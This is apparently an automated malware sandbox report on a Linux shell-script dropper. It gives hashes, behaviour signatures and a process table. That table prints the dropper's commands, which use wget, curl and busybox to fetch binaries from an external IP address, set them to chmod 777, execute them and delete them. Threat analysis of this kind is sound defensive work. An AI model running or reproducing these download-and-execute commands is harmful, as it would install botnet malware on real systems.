Analysis
max time kernel: 28s
max time network: 29s
platform: debian-9_armhf
resource: debian9-armhf-20240418-en
resource tags: arch:armhf, image:debian9-armhf-20240418-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 21/11/2024, 04:11
Static task: static1
Behavioral task behavioral1: sample 34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh, resource ubuntu1804-amd64-20240729-en
Behavioral task behavioral2: sample 34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh, resource debian9-armhf-20240418-en
Behavioral task behavioral3: sample 34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample 34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh, resource debian9-mipsel-20240729-en
General
Target: 34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh
Size: 10KB
MD5: c37909f22e6c9757fe113ee40d48afe5
SHA1: eb767ecc9f0b5a38dad577537365d1c7d7940a88
SHA256: 34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858
SHA512: 355bfcd57d9a25ee4c1baace0bace4182e17c6cd5f723c5b8fa94666c6bcb0526868cdace553284d20d600ea9b6468511f9d26ee8f0f3fcd4d3ba8a99edf07d2
SSDEEP: 192:m+ymFtr7pJ8KWTgPb27RRbA7frJ4ofBBzrPp71D1H1iiEBNa3ju7EMckiuR3jOEs:nQHjAfJxVihBNZAOWxVihBitB
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Process: chmod (28 instances); pids 910, 892, 752, 764, 874, 898, 677, 719, 832, 844, 850, 868, 705, 809, 886, 770, 862, 880, 856, 838, 793, 822, 904, 733, 683, 690, 780, 666
Executes dropped EXE 28 IoCs
ioc | pids | Process (each dropped file was executed twice, 28 entries in total)
/tmp/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | 667, 857 | 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ
/tmp/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | 678, 863 | PRidtlDXU05jmgjuUObnLgOEzRMj94T04O
/tmp/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | 684, 869 | pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE
/tmp/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | 692, 875 | SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB
/tmp/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | 707, 899 | JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak
/tmp/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | 720, 905 | QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9
/tmp/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | 734, 911 | aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT
/tmp/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | 754, 881 | pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC
/tmp/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | 765, 887 | nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F
/tmp/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | 771, 893 | slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl
/tmp/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | 781, 851 | xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW
/tmp/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | 794, 833 | L2NF59wHsucPEijfToQ067fYfwkMvTPXCB
/tmp/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | 810, 839 | 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG
/tmp/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | 824, 845 | 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description | ioc | Process
File opened for reading | /proc/cpuinfo | curl (28 identical entries)
Reads runtime system information 56 IoCs
description | ioc | Process
File opened for reading | /proc/sys/crypto/fips_enabled | curl (28 entries)
File opened for reading | /proc/self/auxv | curl (28 entries)
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid | Process
656 | curl
663 | busybox
667 | 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ
668 | rm
854 | curl
647 | wget
853 | wget
855 | busybox
857 | 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ
858 | rm
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description | ioc | Process (each of the 14 paths below appears twice in the report, 28 entries in total; the process is curl in every case)
File opened for modification | /tmp/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | curl
File opened for modification | /tmp/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | curl
File opened for modification | /tmp/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | curl
File opened for modification | /tmp/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | curl
File opened for modification | /tmp/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | curl
File opened for modification | /tmp/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | curl
File opened for modification | /tmp/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | curl
File opened for modification | /tmp/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | curl
File opened for modification | /tmp/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | curl
File opened for modification | /tmp/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | curl
File opened for modification | /tmp/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | curl
File opened for modification | /tmp/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | curl
File opened for modification | /tmp/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | curl
File opened for modification | /tmp/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | curl
Processes
Signature abbreviations used in the table below: CPU = Checks CPU configuration, RT = Reads runtime system information, NET = System Network Configuration Discovery, TMP = Writes file to tmp directory, PERM = File and Directory Permissions Modification, EXE = Executes dropped EXE. Level 1 is the submitted script; every level-2 process is its direct child.

PID | level | image | command line | signatures
637 | 1 | /tmp/34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh | /tmp/34986771ed4019a2ed4676396f2136e91cbe11dd1791872db13df1ec29dbe858.sh | -
640 | 2 | /bin/rm | /bin/rm bins.sh | -
647 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | NET
656 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | CPU, RT, NET, TMP
663 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | NET
666 | 2 | /bin/chmod | chmod 777 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | PERM
667 | 2 | /tmp/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | ./9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | EXE, NET
668 | 2 | /bin/rm | rm 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | NET
670 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | -
673 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | CPU, RT, TMP
676 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | -
677 | 2 | /bin/chmod | chmod 777 PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | PERM
678 | 2 | /tmp/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | ./PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | EXE
679 | 2 | /bin/rm | rm PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | -
680 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | -
681 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | CPU, RT, TMP
682 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | -
683 | 2 | /bin/chmod | chmod 777 pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | PERM
684 | 2 | /tmp/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | ./pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | EXE
685 | 2 | /bin/rm | rm pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | -
686 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | -
687 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | CPU, RT, TMP
688 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | -
690 | 2 | /bin/chmod | chmod 777 SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | PERM
692 | 2 | /tmp/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | ./SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | EXE
693 | 2 | /bin/rm | rm SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | -
694 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | -
699 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | CPU, RT, TMP
703 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | -
705 | 2 | /bin/chmod | chmod 777 JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | PERM
707 | 2 | /tmp/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | ./JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | EXE
708 | 2 | /bin/rm | rm JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | -
709 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | -
712 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | CPU, RT, TMP
716 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | -
719 | 2 | /bin/chmod | chmod 777 QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | PERM
720 | 2 | /tmp/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | ./QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | EXE
721 | 2 | /bin/rm | rm QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | -
722 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | -
727 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | CPU, RT, TMP
730 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | -
733 | 2 | /bin/chmod | chmod 777 aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | PERM
734 | 2 | /tmp/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | ./aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | EXE
735 | 2 | /bin/rm | rm aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | -
736 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | -
742 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | CPU, RT, TMP
747 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | -
752 | 2 | /bin/chmod | chmod 777 pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | PERM
754 | 2 | /tmp/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | ./pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | EXE
755 | 2 | /bin/rm | rm pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | -
756 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | -
760 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | CPU, RT, TMP
763 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | -
764 | 2 | /bin/chmod | chmod 777 nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | PERM
765 | 2 | /tmp/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | ./nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | EXE
766 | 2 | /bin/rm | rm nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | -
767 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | -
768 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | CPU, RT, TMP
769 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | -
770 | 2 | /bin/chmod | chmod 777 slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | PERM
771 | 2 | /tmp/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | ./slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | EXE
772 | 2 | /bin/rm | rm slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | -
773 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | -
774 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | CPU, RT, TMP
777 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | -
780 | 2 | /bin/chmod | chmod 777 xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | PERM
781 | 2 | /tmp/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | ./xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | EXE
782 | 2 | /bin/rm | rm xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | -
783 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | -
786 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | CPU, RT, TMP
791 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | -
793 | 2 | /bin/chmod | chmod 777 L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | PERM
794 | 2 | /tmp/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | ./L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | EXE
796 | 2 | /bin/rm | rm L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | -
797 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | -
800 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | CPU, RT, TMP
806 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | -
809 | 2 | /bin/chmod | chmod 777 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | PERM
810 | 2 | /tmp/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | ./8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | EXE
811 | 2 | /bin/rm | rm 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | -
813 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | -
816 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | CPU, RT, TMP
819 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | -
822 | 2 | /bin/chmod | chmod 777 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | PERM
824 | 2 | /tmp/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | ./9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | EXE
825 | 2 | /bin/rm | rm 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | -
827 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | -
830 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | CPU, RT, TMP
831 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | -
832 | 2 | /bin/chmod | chmod 777 L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | PERM
833 | 2 | /tmp/L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | ./L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | EXE
834 | 2 | /bin/rm | rm L2NF59wHsucPEijfToQ067fYfwkMvTPXCB | -
835 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | -
836 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | CPU, RT, TMP
837 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | -
838 | 2 | /bin/chmod | chmod 777 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | PERM
839 | 2 | /tmp/8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | ./8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | EXE
840 | 2 | /bin/rm | rm 8haYQfPSHOOys89XmJFtp5YzNyfLiMovNG | -
841 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | -
842 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | CPU, RT, TMP
843 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | -
844 | 2 | /bin/chmod | chmod 777 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | PERM
845 | 2 | /tmp/9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | ./9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | EXE
846 | 2 | /bin/rm | rm 9N00LOzMjWI0lCdJgODMPOAedLFWeD93uT | -
847 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | -
848 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | CPU, RT, TMP
849 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | -
850 | 2 | /bin/chmod | chmod 777 xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | PERM
851 | 2 | /tmp/xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | ./xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | EXE
852 | 2 | /bin/rm | rm xXEjczqffV4pNUGkFya7Ug4tXQv1wLUaGW | -
853 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | NET
854 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | CPU, RT, NET, TMP
855 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | NET
856 | 2 | /bin/chmod | chmod 777 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | PERM
857 | 2 | /tmp/9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | ./9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | EXE, NET
858 | 2 | /bin/rm | rm 9Zt1gACcEbxQiiPv84Mw8wjRj2VIyVG1XZ | NET
859 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | -
860 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | CPU, RT, TMP
861 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | -
862 | 2 | /bin/chmod | chmod 777 PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | PERM
863 | 2 | /tmp/PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | ./PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | EXE
864 | 2 | /bin/rm | rm PRidtlDXU05jmgjuUObnLgOEzRMj94T04O | -
865 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | -
866 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | CPU, RT, TMP
867 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | -
868 | 2 | /bin/chmod | chmod 777 pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | PERM
869 | 2 | /tmp/pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | ./pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | EXE
870 | 2 | /bin/rm | rm pRGsHll305LOAjT66GtpxTBrFbmFK4qYbE | -
871 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | -
872 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | CPU, RT, TMP
873 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | -
874 | 2 | /bin/chmod | chmod 777 SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | PERM
875 | 2 | /tmp/SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | ./SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | EXE
876 | 2 | /bin/rm | rm SEcuTOyU7I8Dx8CEL5gSakadnkd5UuVnPB | -
877 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | -
878 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | CPU, RT, TMP
879 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | -
880 | 2 | /bin/chmod | chmod 777 pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | PERM
881 | 2 | /tmp/pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | ./pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | EXE
882 | 2 | /bin/rm | rm pVlkF95JQcZ2GcBwedI2mGSgPYzFbP4STC | -
883 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | -
884 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | CPU, RT, TMP
885 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | -
886 | 2 | /bin/chmod | chmod 777 nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | PERM
887 | 2 | /tmp/nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | ./nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | EXE
888 | 2 | /bin/rm | rm nJxIQTqOQUTVQxVjrI2b3XQNM8fu3nWs5F | -
889 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | -
890 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | CPU, RT, TMP
891 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | -
892 | 2 | /bin/chmod | chmod 777 slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | PERM
893 | 2 | /tmp/slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | ./slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | EXE
894 | 2 | /bin/rm | rm slojVVR4JNOkF57jCfrLPcUbsC3eUwtjKl | -
895 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | -
896 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | CPU, RT, TMP
897 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | -
898 | 2 | /bin/chmod | chmod 777 JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | PERM
899 | 2 | /tmp/JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | ./JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | EXE
900 | 2 | /bin/rm | rm JbN1YmFYxt9j7KpjLo3QCmN8LmCbJSklak | -
901 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | -
902 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | CPU, RT, TMP
903 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | -
904 | 2 | /bin/chmod | chmod 777 QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | PERM
905 | 2 | /tmp/QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | ./QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | EXE
906 | 2 | /bin/rm | rm QmpVv9y4bbaIIuu6V2xnh9zPRKyWddy8s9 | -
907 | 2 | /usr/bin/wget | wget http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | -
908 | 2 | /usr/bin/curl | curl -O http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | CPU, RT, TMP
909 | 2 | /bin/busybox | /bin/busybox wget http://87.120.125.191/bins/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | -
910 | 2 | /bin/chmod | chmod 777 aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | PERM
911 | 2 | /tmp/aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | ./aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | EXE
912 | 2 | /bin/rm | rm aCRWn8gOi1dweCNnELpApEhk8abvSvhaMT | -
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification: 1
Linux and Mac File and Directory Permissions Modification: 1
Virtualization/Sandbox Evasion: 1
System Checks: 1
Downloads
Filesize: 153B
